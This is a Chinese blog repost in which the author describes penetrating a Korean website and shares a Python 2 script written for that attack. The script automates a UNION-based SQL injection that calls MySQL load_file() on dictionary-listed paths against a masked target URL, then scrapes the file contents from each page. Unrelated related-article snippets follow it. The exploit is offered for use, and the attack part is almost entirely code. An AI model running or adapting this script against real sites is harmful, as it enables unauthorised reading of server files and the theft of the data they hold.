Python in Hacking[LOAD_FILE() Helper]

简介:

Pnig0s p.s: 渗透一韩国站,遭遇Mysql4,好在有FILE权限只能批量LOAD_FILE路径,为了避免繁重的工作量写了这个脚本,字典文件名为dic.txt路径一行一个,因为环境不同,此脚本并非通用,稍作改动即可。复制代码请务必在普通IE下复制

 


 
 
  1. #!/usr/bin/python 
  2. # -*- coding:utf-8 -*- 
  3. ######################################## 
  4. #          Coder:Pnig0s1992 
  5. # A script to auto use the LOAD_FILE()  
  6. #      GTalk:pnigos70@gmail.com  
  7. #Blog:http://pnig0s1992.blog.51cto.com/ 
  8. # 
  9. ######################################## 
  10. import urllib 
  11. import binascii 
  12. import string 
  13. import os 
  14. def guessPath(): 
  15.     fi = open('dic.txt','r+'
  16.     while True
  17.         path = fi.readline().strip() 
  18.         if path: 
  19.             url = 'http://www.xxx.co.kr/?mode=view&no=\ 
  20.             1151 AnD 1=2 UnIon SeleCt 1,2,3,4,5,load_file(0x'+binascii.b2a_hex(str(path))+')' 
  21.             EnUrl=urllib.quote_plus(url,safe=':\'/?&=()|'
  22.             fd = urllib.urlopen(EnUrl) 
  23.             res = fd.read() 
  24.             Begin = res.rfind('<table width="450" border="0" cellspacing="0" cellpadding="0">'
  25.             End = res.rfind('<table width="486" border="0" cellspacing="0" cellpadding="0">'
  26.             tempDate = res[Begin:End] 
  27.             realBegin = tempDate.index('<td>')+4 
  28.             realEnd = tempDate.index('</td>'
  29.             checkEmpty = tempDate[realBegin:realEnd].strip() 
  30.             if checkEmpty: 
  31.                 print path+' is exists!!!!!!!!!!!' 
  32.                 print 'Geting the data......' 
  33.                 print checkEmpty 
  34.                 os.system('pause'
  35.             else
  36.                 print path+' is not exists.' 
  37.                 continue 
  38.         else
  39.             print 'All has finished...' 
  40.             break 
  41.  
  42. if __name__ == '__main__'
  43.     print '__________Written by Pnig0s1992__________' 
  44.     guessPath() 

 

 

 

 













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/473735,如需转载请自行联系原作者

相关文章
基于Multisim的BJT共射电路的仿真
下面是基于Multisim的BJT共射电路的仿真步骤: 1. 打开Multisim软件,创建新的仿真文件。 2. 在Components栏中选择BJT晶体管,将其拖放到工作区中。 3. 在Components栏中选择电源,将其拖放到工作区中。 4. 在Components栏中选择电阻,将其拖放到工作区中。 5. 连接电源和地线。 6. 连接电阻和BJT晶体管,形成基本的共射电路。 7. 右键单击电源,选择Properties,设置电源电压。 8. 右键单击电阻,选择Properties,设置电阻值。 9. 设置其他仿真参数,如仿真时间、仿真步长等。 10. 运行仿真,观察输出波形和电路性能参数
700 0
|
7月前
|
编解码 JSON 缓存
巧筑虚拟星河:Dev中的预览技巧
ArkUI预览器是HarmonyOS开发中的高效工具,支持实时与动态预览功能。实时预览可秒级刷新样式修改,动态预览则模拟真机交互体验。设备支持手机、平板、车机及智能手表等,但禁用账号登录、多媒体播放等功能。启动需通过菜单导航,电脑需支持OpenGL 3.2+。预览模式分页面和组件预览,前者测流程后者调样式。虚拟设备可测试多屏幕适配,避免硬件依赖。双向预览实现代码与界面联动,Hamock插件支持数据模拟,提升调试效率。总结:改样式用实时预览,测交互用动态预览,复杂场景需真机验证!
248 15
|
数据采集 机器学习/深度学习 测试技术
数据清洗与过滤中,如何确定哪些数据是高质量的?
数据清洗与过滤中,如何确定哪些数据是高质量的?
|
机器学习/深度学习 数据采集 人工智能
AI在医疗:深度学习在医学影像诊断中的最新进展
【10月更文挑战第26天】近年来,深度学习技术在医学影像诊断中的应用日益广泛,通过训练大量医学影像数据,实现对疾病的准确诊断。例如,卷积神经网络(CNN)已成功用于识别肺癌、乳腺癌等疾病。深度学习不仅提高了诊断准确性,还缩短了诊断时间,提升了患者体验。然而,数据隐私、数据共享和算法透明性等问题仍需解决。未来,AI将在医学影像诊断中发挥更大作用,成为医生的得力助手。
763 0
|
机器学习/深度学习
清华领衔发布多模态评估MultiTrust:GPT-4可信度有几何?
【8月更文挑战第16天】近日,清华大学等机构发布了MultiTrust多模态评估研究,旨在全面评估大型语言模型的可信度。这是首个统一的多模态基准,覆盖真实性、安全性等五大方面,包含32个任务。研究对21个现代模型进行了实验,揭示了可信度问题和风险,强调了提高模型可靠性的重要性。结果显示开源模型在可信度上落后于专有模型,特别是在安全性方面。此外,研究还发现了模型在鲁棒性、公平性和隐私方面的挑战。论文已发布于arxiv.org。
299 1
|
前端开发 JavaScript 数据处理
深入Python Web开发:模板引擎的力量与最佳实践
【7月更文挑战第21天】Python Web开发中,模板引擎如Jinja2促进MVC架构的View层,分离后端数据与前端展示,提升开发效率和代码复用。选择适合的模板引擎,利用其数据注入、模板继承等特性,保持模板简洁,注重安全性,是最佳实践。例如,Jinja2允许在HTML中嵌入变量并处理循环,简化渲染过程。
260 0
|
存储 程序员 定位技术
程序员必知:地图投影与ArcGIS坐标系转换
程序员必知:地图投影与ArcGIS坐标系转换
456 0
|
前端开发
CSS圆形头像以及发光效果实现
CSS圆形头像以及发光效果实现
|
JSON 小程序 API
小程序(三十四)微信小程序开启订阅消息推送
我这里记录一下我在配置订阅消息推送的时候发生的一些小问题吧,算是经验,给没有做过的同学避个坑。 官方文档地址:小程序订阅消息 | 微信开放文档 (qq.com)
692 0

热门文章

最新文章